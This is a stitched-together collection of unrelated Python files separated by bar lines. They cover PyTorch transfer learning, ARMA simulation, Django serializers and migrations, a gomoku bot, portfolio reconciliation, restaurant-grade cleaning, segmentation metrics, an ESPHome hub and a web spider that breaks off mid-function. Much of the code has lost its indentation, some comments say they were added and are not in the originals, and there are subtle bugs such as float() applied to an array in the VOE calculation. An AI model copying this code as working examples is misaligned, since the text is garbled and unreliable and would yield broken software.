elif model == "resnet":
model_conv = torchvision.models.resnet18(pretrained=True)
num_ftrs = model_conv.fc.in_features
model_conv.fc = nn.Linear(num_ftrs, classes)
total_param = round(percentage_frozen*len(list(model_conv.parameters())))
for param in list(model_conv.parameters())[:total_param]:
param.requires_grad = False
model_conv = model_conv.to(device)
criterion = nn.CrossEntropyLoss()
# Observe that only parameters of final layer are being optimized as
# opposed to before.
# https://github.com/pytorch/pytorch/issues/679
optimizer_conv = optim.SGD(filter(lambda p: p.requires_grad,
model_conv.parameters()),
lr=0.001, momentum=0.9)
# Decay LR by a factor of 0.1 every 7 epochs
exp_lr_scheduler = lr_scheduler.StepLR(optimizer_conv, step_size=5,
gamma=0.1)
    model_conv = train_model(model_conv, criterion, optimizer_conv,
                             exp_lr_scheduler, epochs,
                             dataloaders, device, dataset_sizes, classes, path)
    return model_conv
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--pct_freeze",
help="the percentage of layers frozen",
type=float, default=0.9, dest="pctf")
parser.add_argument("--classf_net", help="classification network",
default="squeezenet", type=str, dest="clf")
parser.add_argument("--num_epochs", help="number of epochs",
default=5, type=int, dest="epochs")
parser.add_argument("--train", help="either train or test",
dest="train", type=int, default=0)
parsed = parser.parse_args()
dataloaders, dataset_sizes, class_names, device, datas = load_data(
"./images_app_detection/")
if parsed.train:
train(parsed.epochs, parsed.clf, len(class_names), parsed.pctf,
device,
dataloaders, dataset_sizes, "./saved_models/" +
parsed.clf + "_detection.tar")
else:
model = load_model("./saved_models/" +
parsed.clf + "_detection.tar",
parsed.clf,
len(class_names), parsed.pctf)
        evaluate_model(model, dataloaders, dataset_sizes, device)
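# Hedged usage examples (not in the original script; the script name below is a
# placeholder and the data layout is an assumption based on load_data above):
#   python transfer_learning.py --train 1 --classf_net resnet --num_epochs 10 --pct_freeze 0.9
#   python transfer_learning.py --train 0 --classf_net squeezenet
# The data directory "./images_app_detection/" is expected to contain train/,
# val/ and test/ subfolders in torchvision ImageFolder layout.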
|
import statsmodels.api as sm
import numpy as np
import matplotlib.pyplot as plt

# Parameters (overridden below with empty arrays, which reduces the
# simulation to plain white noise).
ar = np.array([.75, -.25])
ma = np.array([.65, .35])
ar = np.array([])
ma = np.array([])

# Simulate an ARMA process.
np.random.seed(42)
y = sm.tsa.arma_generate_sample(
    ar=np.r_[1, ar],
    ma=np.r_[1, ma],
    nsample=10000,
    scale=1,  # named `sigma` in very old statsmodels releases
)
fig, ax = plt.subplots(1, 1)
ax.plot(y)
plt.show()
# Fit an ARMA model on the simulated sample to check coefficients, ACF and PACF.
# Plot ACF and PACF of the simulated series.
sm.graphics.tsa.plot_acf(y, lags=20, zero=True)
sm.graphics.tsa.plot_pacf(y, lags=20, zero=True)
model = sm.tsa.ARMA(y, (1, 2)).fit(trend='c')
print(model.summary())
model.predict()
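# Hedged sketch (not in the original): sm.tsa.ARMA was removed in newer
# statsmodels releases; an ARMA(1, 2) with a constant can be fitted through the
# ARIMA front end instead.
from statsmodels.tsa.arima.model import ARIMA

arima_model = ARIMA(y, order=(1, 0, 2), trend='c').fit()
print(arima_model.summary())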
|
"""
样式美化:
"""
import matplotlib.pyplot as plt
import numpy as np
# 样式美化:
plt.style.use('ggplot')
# plt.style.use('fivethirtyeight')
# 第一个图像:
fig, ax = plt.subplots(ncols=2, nrows=2) # 生成4个子图
ax1, ax2, ax3, ax4 = ax.ravel() # 将4个子图分给这四个对象
x, y = np.random.normal(size=(2, 100))
ax1.plot(x, y, 'o')
# 第二个图像:
x = np.arange(10)
y = np.arange(10)
ncolors = len(plt.rcParams['axes.prop_cycle'])
shift = np.linspace(0, 10, ncolors)
for s in shift:
ax2.plot(x, y+s, '-')
# 第三个图像:
x = np.arange(5)
y1, y2, y3 = np.random.randint(1, 25, size=(3, 5))
width = 0.25
ax3.bar(x, y1, width)
ax3.bar(x+width, y2, width, color='g')
ax3.bar(x+2*width, y3, width, color='r')
# 图像4:
for i, color in enumerate(list('rbgykmrbgykm')):
x, y = np.random.normal(size=2)
ax4.add_patch(plt.Circle([x, y], 0.3, color=color))
ax4.axis('equal')
plt.show()
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext as _
from rest_framework import serializers, viewsets, exceptions
from app.courses.models import Course
from app.choosing.models import ResolvedCombination
class TeacherViewObject(object):
def __init__(self, id, name):
self.id = id
self.name = name
class TeacherViewSerializer(serializers.Serializer):
id = serializers.IntegerField()
name = serializers.CharField()
class CourseTeachersSerializer(serializers.Serializer):
id = serializers.IntegerField()
acronym = serializers.CharField()
teachers = serializers.SerializerMethodField('_teachers_list')
def _teachers_list(self, instance):
# whoops... missing choosing, TODO
combs = ResolvedCombination.objects.filter(
course=instance.id
)
passed_teachers = list()
for c in combs.filter(accepted=True):
passed_teachers.append(c.teacher)
denied_teachers = list()
for c in combs.filter(accepted=False):
denied_teachers.append(c.teacher.id)
if len(passed_teachers) == 0:
passed_teachers = instance.teachers.exclude(id__in=denied_teachers)
teachers = []
for t in passed_teachers:
tv = TeacherViewObject(id=t.id, name=str(t))
tvs = TeacherViewSerializer(tv)
            teachers.append(tvs.data)
return teachers
    class Meta:
        # Note: Meta is only honoured by ModelSerializer; on a plain
        # Serializer these attributes are informational.
        model = Course
        fields = ("id", "acronym", "teachers")
class CourseTeachersViewSet(viewsets.ModelViewSet):
queryset = Course.objects.all()
serializer_class = CourseTeachersSerializer
http_method_names = ['get', 'head', 'options']
views_to_register = (
(r'course-teachers', CourseTeachersViewSet),
)
|
import random
PATTERNS = [
(10000000000000000, 'xxxxx'),
(-1000000000000000, 'ooooo'),
(100000000000, ' xxxx '),
(-10000000000, ' oooo '),
(-10000000000, 'oxxxx '),
(-10000000000, ' xxxxo'),
(-100000000, 'xoooo '),
(-100000000, ' oooox'),
(1000000000, 'xx xx'),
(-100000000, 'oo oo'),
(-10000000, ' oo o'),
(-10000000, 'oo o '),
(-10000000, ' o oo'),
(-10000000, 'o oo '),
(1000, 'xooox'),
(1000, 'xooox'),
(10000, 'xooo'),
(10000, 'ooox'),
(-100000000, 'xx o'),
(-100000000, 'o xx'),
(1000000, ' xxx '),
(-1000000, ' ooo '),
(-100, ' o o '),
(10, ' xx '),
(-10, ' oo '),
(1, ' x ')
]
class Board:
SIZE = 15
def generate_rows(self):
rows = []
for i in range(self.SIZE):
row = []
for j in range(self.SIZE):
row.append(0)
rows.append(row)
return rows
def generate_diagonals(self):
diagonals = []
delka = 1
for i in range(self.SIZE):
diagonal = []
for j in range(delka):
diagonal.append(0)
diagonals.append(diagonal)
delka += 1
delka = 14
for i in range(self.SIZE - 1):
diagonal = []
for j in range(delka):
diagonal.append(0)
diagonals.append(diagonal)
delka -= 1
        # print(diagonals)  # debug output
return diagonals
def __init__(self):
self.rows = self.generate_rows()
self.columns = self.generate_rows()
self.diagonals_descending = self.generate_diagonals()
self.diagonals_ascending = self.generate_diagonals()
        # print(self.diagonals_descending)  # debug output
def row_to_string(self, row):
output = ''
for i in row:
if (i == 0):
output += ' '
if (i == 1):
output += 'x'
if (i == -1):
output += 'o'
return output
def evaluate_row(self, row):
string_row = self.row_to_string(row)
total_score = 0
for pattern in PATTERNS:
score, p = pattern
if p in string_row:
#print(f'found pattern {p} in {row}')
total_score += score
#total_score = total_score + score
return total_score
def evaluate_position(self):
total_score = 0
for row in self.rows:
total_score += self.evaluate_row(row)
for column in self.columns:
total_score += self.evaluate_row(column)
for asc in self.diagonals_ascending:
total_score += self.evaluate_row(asc)
for disc in self.diagonals_descending:
total_score += self.evaluate_row(disc)
return total_score
def new_turn(self, row, column, player):
self.rows[row][column] = player
self.columns[column][row] = player
ascending_diagonal_number = row + column
if (row + column < self.SIZE):
self.diagonals_ascending[ascending_diagonal_number][column] = player
else:
self.diagonals_ascending[ascending_diagonal_number][self.SIZE - 1 - row] = player
descending_diagonal_number = self.SIZE - 1 - row + column
if (descending_diagonal_number < 15):
self.diagonals_descending[descending_diagonal_number][column] = player
else:
self.diagonals_descending[descending_diagonal_number][row] = player
#self.print_all()
def get(self, row, col):
return self.rows[row][col]
def print_all(self):
print('rows')
for row in self.rows:
print(row)
print('cols')
for col in self.columns:
print(col)
print('desc')
for d in self.diagonals_descending:
print(d)
print('asc')
for d in self.diagonals_ascending:
print(d)
class Player:
    def __init__(self, player_sign):
        # player_sign is currently ignored: the PATTERNS table above is written
        # from the perspective of 'x' (sign +1), so this player always plays x.
        self.sign = 1
        self.opponent_sign = -1
        self.name = 'Patrik2'
        self.board = Board()
        random.seed(17)
"""
def pick_random_valid_turn(self):
while True:
row = random.randint(0, 14)
col = random.randint(0, 14)
if (self.board.get(row, col) == 0): return (row, col)
"""
def pick_best_turn(self):
best_score = (-float('inf'))
best_turn = None
for row in range(15):
for col in range(15):
if (self.board.get(row, col) != 0): continue
self.board.new_turn(row, col, self.sign)
score = self.board.evaluate_position()
if score > best_score:
best_turn = (row, col)
best_score = score
self.board.new_turn(row, col, 0)
return best_turn
def play(self, opponent_move):
if opponent_move != None:
row, col = opponent_move
self.board.new_turn(row, col, self.opponent_sign)
#my_turn_row, my_turn_col = self.pick_random_valid_turn()
my_turn_row, my_turn_col = self.pick_best_turn()
self.board.new_turn(my_turn_row, my_turn_col, self.sign)
return my_turn_row, my_turn_col
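# Hedged usage sketch (not part of the original): a minimal driver that lets
# the bot play against itself; the real tournament driver is assumed to
# alternate calls to Player.play() in a similar way.
if __name__ == '__main__':
    bot_a = Player(1)
    bot_b = Player(-1)  # note: the sign argument is currently ignored, see __init__
    move = None
    for _ in range(5):
        move = bot_a.play(move)
        move = bot_b.play(move)
    bot_a.board.print_all()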
|
import argparse
from pathlib import Path
def main(filepath):
with open(filepath, "r") as file1:
positions = {}
transactions = {}
day = ""
section = ""
while True:
line = file1.readline()
if not line:
break
elif line.strip() == "":
continue
if "-POS" in line or "-TRN" in line:
section = line.split("-")[1].strip()
day = str(line.split("-")[0].split("D")[1])
elif section == "POS":
if day not in positions:
positions[day] = {}
symbol = line.split()[0]
shares = float(line.split()[1])
positions[day][symbol] = shares
elif section == "TRN":
if day not in transactions:
transactions[day] = []
transactions[day].append(line.split())
update_activity(positions, transactions)
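# Assumed input layout (inferred from the parser above, not given in the
# original file): day headers such as "D0-POS" or "D1-TRN" introduce sections,
# position lines are "SYMBOL SHARES", and transaction lines are
# "SYMBOL ACTION SHARES VALUE", e.g.:
#   D0-POS
#   Cash 1000
#   AAPL 10
#   D1-TRN
#   AAPL SELL 5 800
#   D1-POS
#   Cash 1800
#   AAPL 5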
def update_activity(positions, transactions):
positions_copy = {}
for day in transactions:
previous_day = str(int(day) - 1)
positions_copy[day] = positions[previous_day].copy()
for trans in transactions[day]:
position_day = positions_copy[day]
symbol = trans[0]
action = trans[1]
shares = float(trans[2])
value = float(trans[3])
if symbol != "Cash":
if symbol not in position_day:
position_day[symbol] = 0
if action == "SELL":
position_day[symbol] -= shares
position_day["Cash"] += value
if position_day[symbol] == 0:
del position_day[symbol]
elif action == "BUY":
position_day[symbol] += shares
position_day["Cash"] -= value
elif action == "DIVIDEND":
position_day["Cash"] += value
else:
if symbol not in position_day:
position_day["Cash"] = 0
if action == "DEPOSIT":
position_day["Cash"] += value
elif action == "FEE":
position_day["Cash"] -= value
reconcile(positions, positions_copy)
def reconcile(positions, positions_copy):
diff = {}
for day in positions_copy:
copy_day = positions_copy[day]
for symbol in copy_day:
original_day = positions[day]
if symbol not in original_day:
diff[symbol] = format_number(0 - copy_day[symbol])
elif copy_day[symbol] != original_day[symbol]:
difference = original_day[symbol] - copy_day[symbol]
diff[symbol] = format_number(difference)
for symbol in original_day:
if symbol not in copy_day:
diff[symbol] = format_number(original_day[symbol])
            elif copy_day[symbol] != original_day[symbol]:
                difference = original_day[symbol] - copy_day[symbol]
                diff[symbol] = format_number(difference)
write_output(diff)
def write_output(diff):
with open("recon.out", "w") as output_file:
header = "---------\n"
lines = ""
for symbol in diff:
lines += symbol + " " + str(diff[symbol]) + "\n"
output_file.write(header + lines)
def format_number(num):
return int(num) if float(num).is_integer() else num
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("file_path", type=Path)
p = parser.parse_args()
if p.file_path.exists():
main(p.file_path)
|
"""def calculator(num1,operation,num2):
if (operation == "+"):
print (num1 + num2)
elif (operation == "-"):
print (num1 - num2)
elif (operation == "*"):
print (num1 * num2)
elif (operation == "/"):
print (num1 / num2)
else:
print("not a valid operation")
calculator(11,"*",9)"""
def add(num1, num2):
print (int(num1) + int(num2))
def subtract(num1, num2):
print (int(num1)-int(num2))
def multiply(num1, num2):
print(int(num1)*int(num2))
def divide(num1, num2):
print(int(num1)/int(num2))
def calculator():
    # Keep prompting until both operands parse as integers.
    check = False
    while not check:
        try:
            num1 = int(input("first num: "))
            num2 = int(input("second num: "))
            op = input("put operation: ")
            check = True
        except ValueError:
            print('needs to be a number')
    if op == "+":
        add(num1, num2)
    elif op == "-":
        subtract(num1, num2)
    elif op == "*":
        multiply(num1, num2)
    elif op == "/":
        divide(num1, num2)
    else:
        print("not a valid operation")
calculator()
calculator()
|
# Generated by Django 3.1 on 2020-10-16 06:58
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Announcement',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('author', models.CharField(max_length=16, verbose_name='发布人')),
('title', models.TextField(max_length=100, verbose_name='标题')),
('content', models.TextField(max_length=800, verbose_name='内容')),
('require_upload', models.BooleanField(default=False, verbose_name='需要上传')),
('issue_datetime', models.DateTimeField(auto_now_add=True, verbose_name='发布时间')),
('edit_datetime', models.DateTimeField(auto_now=True, verbose_name='最新修改时间')),
('deadline', models.DateTimeField(blank=True, verbose_name='截止时间')),
('url_address', models.TextField(blank=True, max_length=200, verbose_name='转发路径')),
('active', models.BooleanField(default=True, verbose_name='启用')),
('team_id', models.CharField(max_length=32, null=True, verbose_name='团队id')),
],
options={
'verbose_name': '公告',
'verbose_name_plural': '公告',
},
),
migrations.CreateModel(
name='AnnouncementRecord',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('aid', models.IntegerField(verbose_name='通知id')),
('reader', models.CharField(max_length=16, verbose_name='阅读人')),
('image', models.ImageField(blank=True, upload_to='image', verbose_name='图片')),
('read_datetime', models.DateTimeField(auto_now=True, verbose_name='确认时间')),
('read_status', models.CharField(max_length=10, verbose_name='阅读状态')),
('team_id', models.CharField(max_length=32, null=True, verbose_name='团队id')),
],
options={
'verbose_name': '公告确认明细',
'verbose_name_plural': '公告确认明细',
},
),
migrations.CreateModel(
name='Feedback',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('aid', models.IntegerField(verbose_name='通知id')),
('sender', models.CharField(max_length=16, verbose_name='发送人')),
('sent_datetime', models.DateTimeField(auto_now=True, verbose_name='发送时间')),
('comment', models.TextField(max_length=100, verbose_name='内容')),
('reply_to', models.IntegerField(null=True, verbose_name='回复id')),
('team_id', models.CharField(max_length=32, null=True, verbose_name='团队id')),
],
options={
'verbose_name': '留言',
'verbose_name_plural': '留言',
},
),
]
|
import pandas as pd
import numpy as np
df1 = pd.read_csv('../../data/Datasets/best_film_consolidated.csv')
df2 = pd.read_csv('../../data/Datasets/best_director_consolidated.csv')
df3 = pd.read_csv('../../data/Datasets/best_actor_consolidated.csv')
df4 = pd.read_csv('../../data/Datasets/best_actress_consolidated.csv')
on = ['Name', 'Year']
df = df1.merge(df2, how='outer', left_on=on, right_on=on)
df = df.merge(df3, how='outer', left_on=on, right_on=on)
df = df.merge(df4, how='outer', left_on=on, right_on=on)
df = df.fillna(0)  # fillna returns a new frame; assign it back so the fill takes effect
df.drop_duplicates().to_csv('../../data/Datasets/consolidated.csv', index=False)
df[on].drop_duplicates().to_csv('../../data/Datasets/name_and_year.csv', index=False)
|
from model.registry import Registry
from model.connection.connection import Connection
from model.laboralinsertion.inscription import Inscription
from model.users.users import User, UserDAO
import model.laboralinsertion.user
from model.files.files import File
import PyPDF2
import base64
import inject
import logging
import os
from io import BytesIO
if __name__ == '__main__':
logging.getLogger().setLevel(logging.WARNING)
#inject.configure()
conn = Connection(inject.instance(Registry).getRegistry('dcsys'))
con = conn.get()
try:
        uids = set([i.userId for i in Inscription.findById(con, Inscription.findAll(con))])
        for i in uids:
            logging.warning('checking CV of: {}'.format(i))
            usr = UserDAO.findById(con, [i])[0]
            cvi = model.laboralinsertion.user.User.findById(con, i)[0].cv
            try:
                content = base64.b64decode(File.getContentById(con, cvi))
                fn = '/tmp/insercion/{}_{}_{}.pdf'.format(usr.dni, usr.id, cvi)
                with open(fn, 'wb') as f:
                    f.write(content)
                with BytesIO(content) as buff:
                    try:
                        logging.warning('starting to read the pdf')
                        PyPDF2.PdfFileReader(buff)
                        logging.warning('{} {} {} {} ok'.format(usr.dni, usr.name, usr.lastname, cvi))
                        os.remove(fn)
                    except PyPDF2.utils.PdfReadError:
                        logging.warning('User {} {} {} {} has CV {} that is not in pdf format'.format(i, usr.dni, usr.name, usr.lastname, cvi))
            except Exception as e:
                logging.warning('User {} {} {} {} has an error in CV {}'.format(i, usr.dni, usr.name, usr.lastname, cvi))
finally:
conn.put(con)
|
import numpy as np
import expectation
import maximization
import aux_functions
import matplotlib.pyplot as plt
def EM_algorithm(X,pi,A,B,N,max_it,ini):
iter = 0
converged = False
Q = []
K = np.shape(pi)[0]
T = np.shape(X[0][0])[1]
epsilon = 1e-2
alpha = np.zeros((N,K,T)) # one alpha for each sequence
beta = np.zeros((N,K,T)) # one beta for each sequence
gamma = np.zeros((N,K,T)) # one gamma for each sequence
chi = np.zeros((N,T,K,K)) # one chi for each sequence
pb = np.zeros((N,K,T))
    while iter != max_it:
        #print('--------- ITERATION ---> ' + str(iter))
        # Loop over sequences: run the E-step for each observation sequence.
        for seq in range(N):
pb[seq,:,:] = aux_functions.calculate_pb(X[seq][0],B,K)
[alpha[seq,:,:], beta[seq,:,:] ,gamma[seq,:,:], chi[seq,:,:,:] ] = expectation.expectation(X[seq][0],pi,A,pb[seq])
[pi_est,A_est,B_est] = maximization.maximization(X , gamma, chi)
pi = pi_est
A = A_est
B = B_est
Q.append(aux_functions.calculate_cost(X,pi_est,A_est,B_est,gamma,chi))
print('Cost at iteration ' +str(iter)+': '+ str(Q[iter]) )
if iter==0:
iter += 1
else:
if (np.abs(Q[iter] - Q[iter-1]) < epsilon) or (iter==max_it-1 ):
print('Convergence reached at iteration ' + str(iter))
plt.plot(Q)
plt.xlabel('Iterations')
plt.ylabel('Log-likelihood')
plt.savefig('Plot_K_' + str(K)+'_ini_'+str(ini))
plt.show()
return [pi_est, A_est, B_est, gamma, Q ,Q[iter], pb]
else:
iter += 1
|
'''
Created on Nov 30, 2015
@author: Benjamin Jakubowski (buj201)
'''
import pandas as pd
def get_raw_data():
url = 'https://data.cityofnewyork.us/api/views/xx67-kt59/rows.csv?accessType=DOWNLOAD'
return pd.read_csv(url, usecols=['CAMIS','BORO', 'GRADE', 'GRADE DATE'],parse_dates=['GRADE DATE'])
def clean_GRADE(df):
'''
From NYC Open Data: allowed values of GRADE are:
-N = Not Yet Graded
-A = Grade A
-B = Grade B
-C = Grade C
-Z = Grade pending
    -P = Grade pending issued on re-opening following
    an initial inspection that resulted in a closure.
Note grades N, Z, and P are essentially unlabeled, and as such can be excluded
from our analysis.
'''
allowed_grades = ['A','B','C']
mask = (df.GRADE.isin(allowed_grades))
df = df.loc[mask,:]
return df
def clean_BORO(df):
allowed_boro = ['BROOKLYN', 'BRONX', 'MANHATTAN', 'QUEENS', 'STATEN ISLAND']
mask = (df.BORO.isin(allowed_boro))
df = df.loc[mask,:]
return df
def clean_GRADE_DATE(df):
'''Cleans GRADE DATE column- note valid values are datetimes, and
invalid values are NaT (not a time). Returns all records with
datetime entries for GRADE DATE'''
df.dropna(axis=0, subset=['GRADE DATE'], inplace=True)
return df
def clean_and_save_restaurant_data():
    '''Cleans and saves the restaurant grade data from NYC Open Data. Saves cleaned data
in a csv file in the 'data' directory.'''
rest_data = get_raw_data()
rest_data = clean_GRADE(rest_data)
rest_data = clean_BORO(rest_data)
rest_data = clean_GRADE_DATE(rest_data)
rest_data.drop_duplicates(inplace=True) ##Needed since grades entered multiple times on same date
rest_data.to_csv('data/clean_restaurant_grades.csv')
return
|
import numpy as np
import SimpleITK as sitk

# Only numpy and SimpleITK are needed for the VOE/VD computation below.
#y_true = sitk.ReadImage("C:/Users/lenovo/Desktop/safa/driveknee/drive-download-20190515T061013Z-001/IBSR_13/IBSR_13_segTRI_ana.nii")
#y_pred = sitk.ReadImage("C:/Users/lenovo/Desktop/safa/driveknee/drive-download-20190515T061013Z-001/IBSR_13/IBSR_13_segTRI_predict.nii")
def voe(y_true, y_pred):
    """Volumetric Overlap Error (in percent) between two binary masks."""
    y_true_f = y_true.flatten().astype(bool)
    y_pred_f = y_pred.flatten().astype(bool)
    intersection = np.logical_and(y_true_f, y_pred_f).sum()
    union = np.logical_or(y_true_f, y_pred_f).sum()
    return 100 * (1. - intersection / float(union))
#vd = (100 * (y_true_f.sum() - y_pred_f.sum()) / float(y_pred_f.sum()))
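# Hedged companion sketch (not in the original): Relative Volume Difference in
# percent, mirroring the commented-out formula above.
def vd(y_true, y_pred):
    y_true_f = y_true.flatten().astype(bool)
    y_pred_f = y_pred.flatten().astype(bool)
    return 100 * (y_true_f.sum() - y_pred_f.sum()) / float(y_pred_f.sum())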
y_true = sitk.ReadImage("IBSR_11_segTRI_ana.nii")
y_pred = sitk.ReadImage("IBSR_11_segTRI_predict.nii")
print("img true")
print (y_true)
print("img predict")
print (y_pred)
#t1 = np.array(y_true)
#p1 = np.array(y_pred)
t1 = sitk.GetArrayViewFromImage(y_true)
p1 = sitk.GetArrayViewFromImage(y_pred)
print("hhhhhhhhiiiiiiiiiiiiiiiiihh")
print("img true_array")
print (t1)
print("img predict_array")
print (p1)
#t1 = y_true.flatten(t)
#p1 = y_pred.flatten(p)
t1 = t1.astype(int)
p1= p1.astype(int)
print("hhhhhhhhiiiiiiiiiiiiiiiiihhhhhhhhhhhhhhhhhhhhhhhh")
#intersection = np.logical_and(y_true, y_pred).sum()
#union = np.logical_or(y_true, y_pred).sum()
#(2. * intersection + 1.) / (y_true.sum() + y_pred.sum() + 1.)
#voe = 100 * (1. - intersection / union)
#vd = 100 * (((y_true).sum() - (y_pred).sum()) / (y_pred).sum())
voe = (100 * (1. - np.logical_and(t1, p1).sum() / float(np.logical_or(t1, p1))))
vd = (100 * (t1.sum() - p1.sum()) / float(p1.sum()))
#voe1 = voe(t1,p1)
print("VOE" , voe)
print("VD" , vd)
|
"""
@author: Eduardo Alvear
"""
def punto1(carros):
c_amarillo = 0
c_rosa = 0
c_roja = 0
c_verde = 0
c_azul = 0
for auto in carros:
if auto == 1 or auto == 2:
c_amarillo += 1
elif auto == 3 or auto == 4:
c_rosa += 1
elif auto == 5 or auto == 6:
c_roja += 1
elif auto == 7 or auto == 8:
c_verde += 1
elif auto == 9 or auto == 0:
c_azul += 1
return {
"Autos amarillos": c_amarillo,
"Autos rosa": c_rosa,
"Autos rojos": c_roja,
"Autos verdes": c_verde,
"Autos azules": c_azul
}
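# Hedged usage example (not in the original): the input values are taken to be
# the last digit of each car's licence plate.
if __name__ == "__main__":
    print(punto1([1, 4, 5, 9, 0, 2, 7]))
    # -> {'Autos amarillos': 2, 'Autos rosa': 1, 'Autos rojos': 1,
    #     'Autos verdes': 1, 'Autos azules': 2}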
|
# use_module.py
from python单例模式.use_module import singleton as s1
from python单例模式.use_module import singleton as s2
print(s1, id(s1))
print(s2, id(s2))
"""
多次导入该实例,其实调用的是一个地址
"""
|
"""
Author: Catherine DeJager (cmd16 on GitHub)
Written for https://github.com/molliem/gender-bias
Detects gender bias in letters of recommendation by searching usage of words that denote effort vs words that denote accomplishment.
"""
import argparse
import nltk
# Create an argument parser and tell it about arguments
parser = argparse.ArgumentParser(description='Look for words that denote effort.')
# argument for the input file (the letter to analyse)
parser.add_argument(
    '-f', '--file', metavar="<file name>",
    help='name of input file')
# optional argument for effort words file
parser.add_argument(
'-e', '--effort_file', dest='effort_file', default="effort_words.wordlist",
metavar="<effort file>",
help='name of file containing effort words')
# optional argument for accomplishment words file
parser.add_argument(
'-a', '--accomplishment_file', dest='accomplishment_file', default="accomplishment_words.wordlist",
metavar="<accomplishment file>",
help='name of file containing accomplishment words')
args = parser.parse_args()
# get the effort words (strip newlines so tokens can match the list entries)
with open(args.effort_file) as f_in:
    effort_words = [line.strip() for line in f_in]
# get the accomplishment words
with open(args.accomplishment_file) as f_in:
    accomplishment_words = [line.strip() for line in f_in]
# get the letter's contents
with open(args.file) as f_in:
    contents = f_in.read()
effort_freqdist = nltk.FreqDist()
accomplishment_freqdist = nltk.FreqDist()
# Note: multi-word phrases are not detected this way (by using word_tokenize).
# TODO: create an option to search the raw text with regular expressions
# count the effort and accomplishment words
for word in nltk.word_tokenize(contents):
if word in effort_words:
effort_freqdist[word] += 1
if word in accomplishment_words: # the two lists should be mutually exclusive, but the user may not abide by that rule
accomplishment_freqdist[word] += 1
# print the results
print("Effort words (and their frequencies:")
for word in effort_freqdist.most_common(): # sorts the words from most to least common
print("%s\t%d" % (word, effort_freqdist[word]))
print("Accomplishment words (and their frequencies:")
for word in accomplishment_freqdist.most_common(): # sorts the words from most to least common
print("%s\t%d" % (word, accomplishment_freqdist[word]))
|
# TODO: Rewrite variance to not need this extension
|
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.const import CONF_ID
AUTO_LOAD = ['sensor', 'text_sensor', 'binary_sensor']
MULTI_CONF = True
CONF_HUB_ID = 'empty_sensor_hub_id'
empty_sensor_hub_ns = cg.esphome_ns.namespace('empty_sensor_hub')
EmptySensorHub = empty_sensor_hub_ns.class_('EmptySensorHub', cg.Component)
CONFIG_SCHEMA = cv.Schema({
cv.GenerateID(): cv.declare_id(EmptySensorHub),
}).extend(cv.COMPONENT_SCHEMA)
def to_code(config):
var = cg.new_Pvariable(config[CONF_ID])
yield cg.register_component(var, config)
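# Hedged example of the YAML that would instantiate this hub component (not in
# the original file); the key name is an assumption based on the namespace
# declared above, and MULTI_CONF allows a list of hubs:
#
#   empty_sensor_hub:
#     - id: my_hub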
|
import urllib2, httplib
from BeautifulSoup import BeautifulSoup, SoupStrainer
import Queue
import re
import socket
import threading
import time
import functools
import cookielib
from django.utils.encoding import force_unicode
from django.utils import importlib
from django.conf import settings
def get_backend(**kwargs):
"""
Returns an instance of the backend interface specified in settings.
Passes kwargs to the backend's init.
"""
backend_path = settings.MAGELLAN_SEARCH_BACKEND
if not backend_path.startswith('magellan.backends.'):
backend_path = "magellan.backends.%s" % backend_path
backend_class = import_class(backend_path)
return backend_class(**kwargs) #todo: snag options from settings and pass them in as kwargs
class UnfetchableURLException(Exception):
pass
class OffsiteLinkException(Exception):
pass
class CannotHandleUrlException(Exception):
pass
def import_class(path):
"""
Probably a duplicate of some functionality I can't find.
Ganked from haystack's code.
Given a string denoting a path to a class, return the class itself.
"""
path_bits = path.split('.')
# Cut off the class name at the end.
class_name = path_bits.pop()
module_path = '.'.join(path_bits)
module_itself = importlib.import_module(module_path)
if not hasattr(module_itself, class_name):
raise ImportError("The Python module '%s' has no '%s' class." % (module_path, class_name))
return getattr(module_itself, class_name)
class memoize(object):
"""Decorator that caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned, and
not re-evaluated.
"""
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
try:
return self.cache[args]
except KeyError:
value = self.func(*args)
self.cache[args] = value
return value
except TypeError:
# uncachable -- for instance, passing a list as an argument.
# Better to not cache than to blow up entirely.
return self.func(*args)
def __repr__(self):
"""Return the function's docstring."""
return self.func.__doc__
def __get__(self, obj, objtype):
"""Support instance methods."""
return functools.partial(self.__call__, obj)
STORE_CONTENT = getattr(settings, 'SPIDER_STORE_CONTENT', True)
domain_re = re.compile('(([a-z]+://)[^/\?]+)*')
subdomain_re = re.compile('([a-z]+://)(.*?\.)+([^\/\?]+\.[^\/\?\.]+([\/\?].*)?)')
def get_domain(url):
match = re.search(domain_re, url)
if match:
return match.group()
return ''
def get_host(url):
domain = get_domain(url)
if domain:
return domain.split('://')[1]
return ''
def relative_to_full(example_url, url):
"""
Given a url which may or may not be a relative url, convert it to a full
url path given another full url as an example
"""
# remove any hashes
url = re.sub('(#[^\/]+)', '', url)
# does this url specify a protocol? if so, it's already a full url
if re.match('[a-z]+:\/\/', url):
return url
# if the url doesn't start with a slash it's probably relative to the
# current url, so join them and return
if not url.startswith('/'):
# check to see if there is a slash after the protocol -- we'll use the
# slash to determine the current working directory for this relative url
if re.match('^[a-z]+:\/\/(.+?)\/', example_url):
return '/'.join((example_url.rpartition('/')[0], url))
# it starts with a slash, so join it with the domain if possible
domain = get_domain(example_url)
if domain:
return '/'.join((domain, url.lstrip('/')))
return url
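# Illustrative behaviour (hypothetical URLs, not from the original module):
#   relative_to_full('http://example.com/articles/1', 'about.html')
#       -> 'http://example.com/articles/about.html'
#   relative_to_full('http://example.com/articles/1', '/about')
#       -> 'http://example.com/about'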
def strip_subdomain(url):
match = subdomain_re.search(url)
if match:
return subdomain_re.sub('\\1\\3', url)
return url
@memoize
def is_on_site(source_url, url, domain_substring=None):
if url.startswith('/'):
return True
if '://' not in url:
if url.startswith('mailto') or url.startswith('javascript'):
return False
return True
if domain_substring and domain_substring not in url:
return False
source_domain = get_domain(source_url)
if not source_domain:
raise ValueError('%s must contain "protocol://host"' % source_url)
domain = get_domain(url)
if domain and domain == source_domain:
return True
# try stripping out any subdomains
if domain and strip_subdomain(domain) == strip_subdomain(source_domain):
return True
return False
#def fetch_url(url, timeout):
# f = urllib2.urlopen(url, timeout=timeout)
# res = f.read()
# f.close()
# return res
def ascii_hammer(content):
